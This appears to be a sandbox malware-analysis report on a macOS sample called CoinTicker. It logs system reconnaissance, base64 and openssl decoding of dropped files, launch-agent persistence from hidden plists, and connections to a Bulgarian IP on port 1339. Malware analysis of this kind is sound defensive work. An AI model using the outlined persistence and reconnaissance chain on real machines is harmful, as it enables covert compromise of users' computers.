Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Sysctl requested: kern.osrelease (1.2)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) Sysctl requested: kern.ostype (1.1)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 696) Sysctl requested: kern.hostname (1.10)
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 700) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 705) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 714) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 718) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 719) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 720) Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 721) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 709) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 722) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 727) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 732) Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (x2)
Source: /usr/bin/sw_vers (PID: 718) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 713) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (x2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 725) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (x2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 730) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (x2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 735) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (x2)

Stealing of Sensitive Information:

Executes the "ifconfig" command used to gather network information
Source: /bin/sh (PID: 701) Ifconfig executable: /sbin/ifconfig -> /sbin/ifconfig

Note: the parent chain is Python (PID 699) -> sh -> ifconfig, and the exact form recorded under Persistence and Installation Behavior is sh -c LC_ALL=C /sbin/ifconfig 2>/dev/null. That is how the CPython 2.7 uuid module obtains the host MAC address when uuid.getnode() is called, so the invocation may be a side effect of the decoded first-stage script importing uuid rather than a deliberate reconnaissance step; the report does not distinguish the two.


Runtime Messages

Command: open
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph

[Behavior graph not reproduced in text. Graph ID 63329, sample xqnTwFKnuR, start date 02/11/2018, architecture MAC, score 60. Network nodes: 185.206.144.226 port 1339 (BELCLOUDBG, Bulgaria); api.manana.kr 133.130.107.154 port 443 from local port 49242 (INTERQGMOInternetIncJP, Japan); 12 other IPs or domains. Process tree: xpcproxy -> CoinTicker -> bash -> {python, base64, bash}, with further bash children running launchctl (twice) and grep; the launch agent jobs appear as xpcproxy -> sh -> sh -> openssl (four in total); the python stage spawns sh -> sh -> ifconfig. Signatures attached in the graph: Detected TCP or UDP traffic on non-standard ports; Decrypts dropped files with the "openssl" command; Many shell processes execute programs via execve syscall; Explicitly loads/starts launch services based on hidden plist files; Executes the "ifconfig" command used to gather network information.]

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots